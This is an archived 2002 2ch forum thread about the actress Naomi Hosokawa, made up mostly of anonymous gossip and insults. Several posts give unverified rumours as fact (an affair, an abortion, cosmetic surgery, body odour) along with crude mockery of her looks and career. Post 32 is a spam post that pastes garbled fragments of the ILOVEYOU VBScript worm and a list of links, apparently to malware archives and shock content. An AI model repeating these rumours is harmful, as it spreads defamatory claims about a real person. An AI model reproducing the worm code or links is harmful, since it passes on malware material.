2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■■■■清楚な美女・細川直美■■■■

1 :こしけん:02/11/02 10:21
人妻になってますます美しくなった美人女優、細川直美様についての
噂話をするスレです。
よろしくおねがいします。

2 :名無しさん@お腹いっぱい。:02/11/02 10:26
垢抜けない

3 :名無しさん@お腹いっぱい。:02/11/02 10:30
芸能界から消えても困らない。

4 :名無しさん@お腹いっぱい。:02/11/02 10:31
野島伸司ちちくりあってた


5 :名無しさん@お腹いっぱい。:02/11/02 10:32
>4
マジ?w

6 :名無しさん@お腹いっぱい。:02/11/02 10:33
マジ。
で、他のタレントに奪われて捨てられて傷心の時に
この前入籍した俳優と出会ったらしい。

7 :名無しさん@お腹いっぱい。:02/11/02 10:35
たくろう

8 :名無しさん@お腹いっぱい。:02/11/02 10:42
高嶋弟と噂あったよね。


9 :名無しさん@お腹いっぱい。:02/11/02 10:46
整形してる

10 :名無しさん@お腹いっぱい。:02/11/02 10:47
わきがくさい

11 :名無しさん@お腹いっぱい。:02/11/02 11:15
堕胎したというのはマジ?噂?

12 :名無しさん@お腹いっぱい。:02/11/02 11:19
性格悪そう

13 :名無しさん@お腹いっぱい。:02/11/02 11:23
ここ3,4年、ほとんどテレビで見なかったな。

14 :名無しさん@お腹いっぱい。:02/11/02 11:33
鼻くそみたいなほくろがいつのまにか消えてた。
それから、すごくSっぽい。

15 :名無しさん@お腹いっぱい。:02/11/02 11:38
ワキガって聞いたことある!
TVでだったような・・・

16 :名無しさん@お腹いっぱい。:02/11/02 12:09
やっぱり鼻くそとったんだ!!

17 :名無しさん@お腹いっぱい。:02/11/02 12:24
>9の「整形してる」が>14の「鼻くそ消えた」につながるのか

18 :名無しさん@お腹いっぱい。:02/11/02 12:27
>>14
それは藤谷美紀じゃないの?

19 :名無しさん@お腹いっぱい。:02/11/02 12:29
藤谷も美少女コン上がり?
ぢみなのばっかり選ぶな。主催の趣味か?
食われちゃうぞw

20 :名無しさん@お腹いっぱい。:02/11/02 13:38
清楚って…禿藁

21 :名無しさん@お腹いっぱい。:02/11/02 13:46
>>18
だなw

22 :名無しさん@お腹いっぱい。:02/11/02 14:00
DHC女優失せろ

23 :名無しさん@お腹いっぱい。:02/11/02 14:12
むか〜し、ジェットコースターに乗りながら(しかも激しいヤシ)
平然と歌を歌っていたのが印象的。

24 :名無しさん@お腹いっぱい。:02/11/02 14:14
髪の毛チリチリの縮毛

25 :名無しさん@お腹いっぱい。:02/11/02 14:15
ほくろあったよねえ?藤谷ほどじゃないけど。

26 :名無しさん@お腹いっぱい。:02/11/02 14:24
18000円、返して下さい。

27 :名無しさん@お腹いっぱい。:02/11/02 14:30
うん、ほくろあったような気がする。
藤谷も取ったよね

28 :名無しさん@お腹いっぱい。:02/11/02 14:46
サラ金のCMのイメージが強すぎる
サラ金の回し者見たいに井までも思うのは、俺だけ?

29 :名無しさん@お腹いっぱい。:02/11/02 14:51
今は2chで悪名高いDHCのCMが有名ですね。
サラ金のCMは目が笑ってなくてコワイ。
結婚でちょっと話題になったけど俳優の彼氏が昼ドラでブレイクしたからだし
あと、この人セシールの通販の広告やってなかった?
だからか、妙に安っぽい。

30 :名無しさん@お腹いっぱい。:02/11/02 16:05
うちの弟がれずっぽいと言っていたw

31 :名無しさん@お腹いっぱい。:02/11/02 16:08
私の中学の時の先生の教え子だったよ。
当時から他の子とはオーラが違っていたらしい。

32 :名無しさん@お腹いっぱい。:02/11/02 16:09
http://dms100.org/worksucks
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
http://skyscraper.fortunecity.com/laser/928/uirs_pak.lzh
http://dildo-drive.porncity.net/122/ugmovie[01-06].ram
http://www2.strangeworld.org/uedakana/sahra6138.jpg
http://windows3000.virtualave.net/Toolz/marburg.zip
http://www.eternal.rest.org.uk/58cy/flesh/3rd-ci53/b268-119.jpg
http://movies.ogrish.com/chechclear.asf
http://music.curio-city.com/curio-buzoo/users/sage/img/96.jpg
http://www8u.kagoya.net/~ut-info/multi/abortion/abortion.mpg
http://www.f3.dion.ne.jp/~parasite/ranbu_sample1017.mpg
http://www.metalflame.com/mm/lovely_mm.htm
http://dempa.2ch.net/prj/page/heisa/news5.html
http://lounge.dip.jp/~yoshinoya_off/up/img/whismng.zip
http://playstation2.hotgames.com/games/ringof/readme.eml
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")


33 :名無しさん@お腹いっぱい。:02/11/02 16:15
>31
他のイパーン人と違うオーラを持っていても
芸能界に入ったら平凡すぎて目立たないという罠。
朝ドラに出てたらしいけどタイトルも何も思い出せない


34 :こじけん:02/11/02 16:18
ここは細川さんを誉め称えるスレッドです。
荒らし目的の方は控えてください。

35 :名無しさん@お腹いっぱい。:02/11/03 07:51
萎え…誉める所なんかあるか。

36 :名無しさん@お腹いっぱい。:02/11/03 10:45
えっ!!晒したくてスレ立てたんじゃなかったのか!!
おぉ、びっくりしたびっくりした(藁

37 :名無しさん@お腹いっぱい。:02/11/03 15:16
34はニセモノ?てんてん付いてる・・

38 :名無しさん@お腹いっぱい。:02/11/03 19:27
変な本出すヒマあったらちゃんと仕事拾ってこいよプロデューサーに
身体投げ出すなりなんなりレトロな方法でも使って。
お前の本業はヘタレでも役者業だろ。
陶芸の本出版だのクイズ番組に出て皺無し脳みそさらすとか
いいともで新人アイドル系のボケかましたって

所詮お前は華のない 2 8 才 の バ バ ア  だ

代表作が大昔に出た朝ドラとかじゃどうしようもないぞ。

39 :名無しさん@お腹いっぱい。:02/11/03 19:29
タモリがこの女好きだったんだっけ?
タモさんって華のない地味なコ好きだよね。伊藤つかさとか。

40 :名無しさん@お腹いっぱい。:02/11/03 22:37
よく見るとブス 目と目の間がへこみすぎ

41 :名無しさん@お腹いっぱい。:02/11/04 00:14
不思議な顔。

42 :名無しさん@お腹いっぱい。:02/11/04 08:48
サフォから出てきたよ

43 :名無しさん@お腹いっぱい。:02/11/04 12:21
肩書きは「女優」なの?
「クイズ番組の頭数合わせ要員(決勝に残らないカスタレント)」とか
「ウルルン系密林で何かあって死んでも芸能界的には困らないおみそ」とか
そういうバカタレントの一人だしょ?

44 :名無しさん@お腹いっぱい。:02/11/04 13:57
サフォって??

45 :こしけ.ん:02/11/04 18:31
明日のはなまるマーケットに御主人である葛山信吾さんが出演するそうです。
結婚秘話や写真などが披露されるかも。

46 :名無しさん@お腹いっぱい。:02/11/04 18:51
葛山のことなんかどーでもいい。
なんかないのか?

47 :名無しさん@お腹いっぱい:02/11/05 09:50
>45
「つむじ」出たよ。話もかなり出ましたよ。

48 :名無しさん@お腹いっぱい。:02/11/11 21:17
清楚な女が野島と乳繰りあったりするのかよー…コソーリ


7 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)